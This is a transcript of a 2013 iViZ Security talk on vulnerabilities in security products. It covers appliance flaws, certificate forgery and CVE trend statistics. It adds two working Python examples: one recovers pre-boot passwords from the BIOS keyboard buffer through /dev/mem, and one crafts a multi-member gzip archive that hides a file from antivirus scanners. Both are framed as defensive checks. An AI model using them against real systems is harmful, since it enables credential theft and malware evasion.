Why Current Security Solutions Fail? Bikash Barai, Co-Founder & CEO, iViZ Security Inc, May 2013 (© iViZ Security Inc)
Presentation transcript:

Slide 1: Introduction

About iViZ
– Cloud-based application penetration testing
– Zero false-positive guarantee
– Business-logic testing with 100% WASC coverage
– 400+ customers; funded by IDG Ventures
– Gartner Hype Cycle mention

About myself
– Co-founder and CEO of iViZ
– Worked in AI, anti-spam filters, multi-stage attack simulation, etc.
– Love AI, security, entrepreneurship, magic / mind reading

Slide 2: Vulnerabilities in Security Products

Slide 3: Symantec appliance (9.5.x)

Rating    Description
Critical  Out-of-band stored XSS, delivered by ...
High      XSS (both reflected and stored) with session hijacking
High      Easy CSRF to add a backdoor administrator (for example)
High      SSH with a backdoor user account, plus privilege escalation to root
High      An authenticated attacker can modify the web application
Medium    Arbitrary file download via a crafted URL
Low       Unauthenticated detailed version disclosure

Credits: Brian Smith

Slide 4: Trend appliance (8.2.0.x)

Rating    Description
Critical  Out-of-band stored XSS in the user portal, delivered via ...
High      XSS (both reflected and stored) with session hijacking
High      Easy CSRF to add a backdoor administrator (for example)
High      Root shell via the patch-upload feature (authenticated)
High      Blind LDAP injection in the user-portal login screen
Medium    Directory traversal (authenticated)
Low       Unauthenticated access to AdminUI logs
Low       Unauthenticated version disclosure

Credits: Brian Smith

Note the pattern across both appliances: the findings are ordinary web-application bugs (XSS, CSRF, injection, traversal) in the product's own management interface, and they chain in the usual way, from stored XSS to session hijacking to a CSRF-created backdoor administrator to a root shell. A security appliance's admin UI deserves exactly the testing you would give any other web application.

Slide 5: Microsoft auto-update hijacking

An MD5 collision attack was used to generate a counterfeit copy of a Microsoft Terminal Server Licensing Service certificate. The counterfeit certificate was then used to sign code, so the malware appeared to be genuine Microsoft code and remained undetected. (This is the technique the Flame malware used in 2012; Microsoft responded by revoking the Terminal Server Licensing certificates in Security Advisory 2718704. Chosen-prefix MD5 collisions yielding a rogue CA certificate had already been demonstrated publicly in 2008, so the weak link was a production CA still issuing MD5-signed certificates.)

Slide 6: Pre-boot authentication attacks

iViZ identified flaws in numerous BIOSes and in pre-boot authentication and disk-encryption software. BitLocker, TrueCrypt, McAfee SafeBoot, DriveCryptor, DiskCryptor, LILO, GRUB, HP BIOS and Intel/Lenovo BIOS were found to be vulnerable. The flaws resulted in disclosure of plaintext pre-boot authentication passwords; in some cases, an attacker could bypass pre-boot authentication entirely.
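The slide does not say where the plaintext password is recovered from. The iViZ research it summarises (Jonathan Brossard, 2008) found that the legacy BIOS int 16h keyboard ring buffer in the BIOS Data Area is read by the pre-boot prompt but never wiped, so the password typed at boot is still sitting at physical address 0x41E after the operating system is up. The check below is an added example, not code from the slides or from iViZ: it parses a BDA snapshot using the standard layout (head pointer at 0x41A, tail pointer at 0x41C, both offsets from 0x400; sixteen ASCII/scancode word pairs at 0x41E..0x43D), and can read a live snapshot from /dev/mem. The live read assumes root, an x86 machine booted through legacy BIOS or CSM (a pure UEFI boot has no BDA keyboard buffer) and a kernel that still exposes the first MiB through /dev/mem; the sample snapshot is constructed.

```python
# Added example (not from the slides): post-boot check for a pre-boot password
# left in the legacy BIOS keyboard ring buffer (BIOS Data Area, physical 0x41E).
# Layout assumed: word at 0x41A = head, word at 0x41C = tail (offsets from
# 0x400), 16 x (ASCII byte, scancode byte) at 0x41E..0x43D.
import os
import struct

BDA_BASE = 0x400      # physical address of the BIOS Data Area
KBD_HEAD = 0x1A       # offset within the BDA of the head pointer
KBD_TAIL = 0x1C       # offset within the BDA of the tail pointer
KBD_BUF = 0x1E        # offset within the BDA of the 32-byte ring buffer
KBD_BUF_LEN = 32


def recover_keystrokes(bda: bytes) -> str:
    """Return the printable characters left in the ring buffer, oldest first.

    Once the pre-boot software has consumed the password, head == tail and the
    buffer is logically empty, but the bytes were never cleared.  So we ignore
    head and walk the whole ring starting at tail, which is the oldest slot.
    """
    if len(bda) < KBD_BUF + KBD_BUF_LEN:
        raise ValueError("need at least 0x40 bytes starting at 0x400")
    (tail,) = struct.unpack_from("<H", bda, KBD_TAIL)
    start = (tail - KBD_BUF) % KBD_BUF_LEN
    chars = []
    for i in range(0, KBD_BUF_LEN, 2):            # one (ASCII, scancode) word per slot
        ascii_byte = bda[KBD_BUF + (start + i) % KBD_BUF_LEN]
        if 0x20 <= ascii_byte < 0x7F:              # skip NULs, CR and control codes
            chars.append(chr(ascii_byte))
    return "".join(chars)


def build_sample_bda(keys: bytes, scancodes: bytes) -> bytes:
    """Constructed snapshot: keys typed into an empty buffer, then consumed."""
    assert len(keys) == len(scancodes) <= 16
    bda = bytearray(KBD_BUF + KBD_BUF_LEN)
    for i, (ch, sc) in enumerate(zip(keys, scancodes)):
        bda[KBD_BUF + 2 * i] = ch
        bda[KBD_BUF + 2 * i + 1] = sc
    end = KBD_BUF + 2 * len(keys)
    struct.pack_into("<HH", bda, KBD_HEAD, end, end)   # head == tail: "empty"
    return bytes(bda)


def read_live_bda() -> bytes:
    """Read 0x400..0x43F from /dev/mem (root; legacy-BIOS x86 only)."""
    fd = os.open("/dev/mem", os.O_RDONLY)
    try:
        return os.pread(fd, KBD_BUF + KBD_BUF_LEN, BDA_BASE)
    finally:
        os.close(fd)


# Constructed sample: "hunter2" followed by Enter, with PC set-1 scancodes.
SAMPLE_BDA = build_sample_bda(
    b"hunter2\r", bytes([0x23, 0x16, 0x31, 0x14, 0x12, 0x13, 0x03, 0x1C]))

if __name__ == "__main__":
    try:
        bda, source = read_live_bda(), "/dev/mem"
    except OSError:
        bda, source = SAMPLE_BDA, "constructed sample"
    print(f"{source}: {recover_keystrokes(bda)!r}")
```

Run as root on a legacy-BIOS machine after a pre-boot password prompt, an output other than the empty string means the password is recoverable by anything that can read low physical memory (a local root, a DMA device, a cold-boot dump). The mitigation side is equally short: the pre-boot prompt should overwrite the 32-byte buffer and reset head and tail after reading the password, and a vendor's fix can be verified with the same function.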

Slide 7: Vulnerabilities in anti-virus products discovered by iViZ Security

Antivirus products must parse many different file formats. We found flaws in the handling of malformed compressed, packed and binary files in AVG, Sophos, Avast and others. Some of the file formats for which we found flaws in AV products are ISO, RPM, ELF, PE, UPX and LZH. Because a scanner's parsers run with system privileges and are reached by any file that lands on the host (mail attachments, downloads, shares), a parser bug in an AV engine is remote, privileged attack surface.

Slide 8: More vulnerabilities in AV products

Detection bypass
– CVE (ID missing from the slide): The gzip file parser in AVG Anti-Virus, Bitdefender, F-Secure and Fortinet antiviruses allows remote attackers to bypass malware detection via a .tar.gz file.

Denial of service (DoS)
– CVE (ID missing from the slide): Unspecified vulnerability in McAfee Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors.
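The gzip entry above is an instance of a parser differential: the scanner's decompressor and the decompressor the victim actually uses disagree about what a .tar.gz contains, and the malware lives in the part the scanner never sees. The slide does not give the CVE's exact trigger, so the example below is an added illustration of the class, not a reproduction of that CVE and not code from the slides: RFC 1952 allows a gzip file to be several concatenated members, gunzip and tar inflate all of them, but a scanner that performs a single zlib pass stops after the first member. The file names, contents and the "signature" string are constructed for the demo.

```python
# Added example (not from the slides): parser-differential detection bypass
# in a .tar.gz via RFC 1952 multi-member gzip.  Sample data is constructed;
# SIGNATURE is a stand-in for an AV signature, not real malware.
import gzip
import io
import tarfile
import zlib

SIGNATURE = b"CONSTRUCTED-TEST-SIGNATURE-NOT-REAL-MALWARE"
BENIGN = b"hello world\n"


def build_tar() -> bytes:
    """One ustar archive: a benign file first, the 'malicious' file second."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in (("README.txt", BENIGN), ("payload.bin", SIGNATURE)):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_split_targz() -> bytes:
    """Split the tar stream at the second entry's header and gzip each half as
    its own member.  Any RFC 1952 decompressor yields the identical valid tar;
    only the member boundary hides the second entry from a one-pass scanner."""
    tar = build_tar()
    with tarfile.open(fileobj=io.BytesIO(tar), mode="r:") as tf:
        split = tf.getmember("payload.bin").offset     # header offset of entry 2
    return gzip.compress(tar[:split]) + gzip.compress(tar[split:])


def naive_inflate(blob: bytes) -> bytes:
    """Model of the buggy scanner: one zlib pass with the gzip wrapper (wbits=31).
    zlib returns at the end of the first member; the rest sits in unused_data."""
    return zlib.decompressobj(wbits=31).decompress(blob)


def full_inflate(blob: bytes) -> bytes:
    """What gunzip/tar do: gzip.decompress inflates every concatenated member."""
    return gzip.decompress(blob)


def tar_entries(data: bytes) -> list:
    """Minimal ustar walker: entry names in order, stopping at the end marker."""
    names, off = [], 0
    while off + 512 <= len(data):
        hdr = data[off:off + 512]
        if hdr == b"\0" * 512:                          # end-of-archive block
            break
        name = hdr[0:100].split(b"\0", 1)[0].decode("ascii")
        size = int(hdr[124:136].split(b"\0", 1)[0].strip() or b"0", 8)
        names.append(name)
        off += 512 + ((size + 511) // 512) * 512        # header + padded data
    return names


def naive_scan(blob: bytes) -> bool:
    return SIGNATURE in naive_inflate(blob)


def correct_scan(blob: bytes) -> bool:
    return SIGNATURE in full_inflate(blob)


if __name__ == "__main__":
    blob = build_split_targz()
    print("one-pass scanner sees:", tar_entries(naive_inflate(blob)), naive_scan(blob))
    print("RFC 1952 scanner sees:", tar_entries(full_inflate(blob)), correct_scan(blob))
```

The defensive rule this illustrates is the one every AV and content-inspection engine has to follow: decompress and walk containers exactly the way the target platform's tools do, including multi-member gzip, trailing data after the first stream, and archive end markers, and treat anything the engine cannot fully parse as suspicious rather than clean.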

Slide 9: Vulnerabilities in VPN products

Remote code execution
– CVE (ID missing from the slide): Cisco AnyConnect Secure Mobility Client 2.x does not properly validate binaries received by the downloader process, which allows remote attackers to execute arbitrary code.
– CVE (ID missing from the slide): Format string vulnerability in the VPN component of Apple iOS before 5.1 allows remote attackers to execute arbitrary code via a crafted racoon configuration file.

The AnyConnect case is the same lesson as the auto-update slide: a downloader that runs what it receives without verifying a signature chained to a pinned publisher turns the update channel itself into a remote code-execution path.

Slide 10: Report Findings

Slide 11: About the report/study

iViZ used the Common Vulnerabilities and Exposures (CVE) list, the Common Platform Enumeration (CPE) dictionary and the National Vulnerability Database (NVD) for the analysis.

Slide 12: Key findings

– Vulnerabilities in security products have been increasing at a CAGR of 37.29% over the last 3 years.
– Anti-virus accounts for 49% of the vulnerabilities, followed by firewalls (24%).
– Top 3 security vendors by number of vulnerabilities: McAfee, Cisco, then Symantec.
– Top 3 security products by number of vulnerabilities: Rising Global's antivirus, Cisco's Adaptive Security Appliance and Ikarus Virus Utilities.
– Access control is the most prominent weakness class in security products, followed by input validation.
– SQL injection is the least common vulnerability class among security products.

Read these as counts of published CVEs: they measure disclosure and research attention as much as code quality, and the security/non-security classification was done by keyword (see the disclaimer on the last slide).

Slide 13: Vulnerability trends (charts: in all products; in security products)

Slide 14: Vulnerabilities by product type in 2012 (chart)

Slide 15: Vulnerabilities by vendor (chart)

Slide 16: (chart only)

Slide 17: Comparative analysis (chart)

Slide 18: Predictions

– We predict an increase in attacks on security products, companies and solutions.
– APT and cyber-warfare make "security products" the next target of choice.
– The majority of vulnerabilities discovered will not become public and will remain in the hands of APT actors.
– Security products are high-pay-off targets because they are present on most systems.
– More vulnerabilities will be sold on the zero-day black market.

Slide 19: What should we do to protect ourselves?

– Test, don't trust (blindly): conduct proper due diligence on the security product, and ask the vendor for audit reports.
– Patch security products like any other product.
– Treat security tools the same as any other tool during threat modeling: the appliance's management interface, update channel and file parsers are attack surface in their own right.
– Have proper detection and monitoring in place, and multi-layer defense, so that a compromised security product is not a single point of failure.

Slide 20: Thank you

Blog:
LinkedIn: barai/0/7a4/669
Twitter: https://twitter.com/bikashbarai1

DISCLAIMER

We have used well-known vulnerability standards and databases: the Common Vulnerabilities and Exposures (CVE) list, the Common Platform Enumeration (CPE) dictionary and the National Vulnerability Database (NVD). One of the major challenges we faced was classifying products into security and non-security products, as the current product standard (CPE) does not support such a classification. We solved this by treating products whose names contain certain keywords, such as 'ID', 'virus', 'firewall', 'IPS' and 'scan', as security products. Some data may therefore have been missed, and the report should be considered indicative. iViZ disclaims all warranties, expressed or implied, with respect to this research for any particular purpose.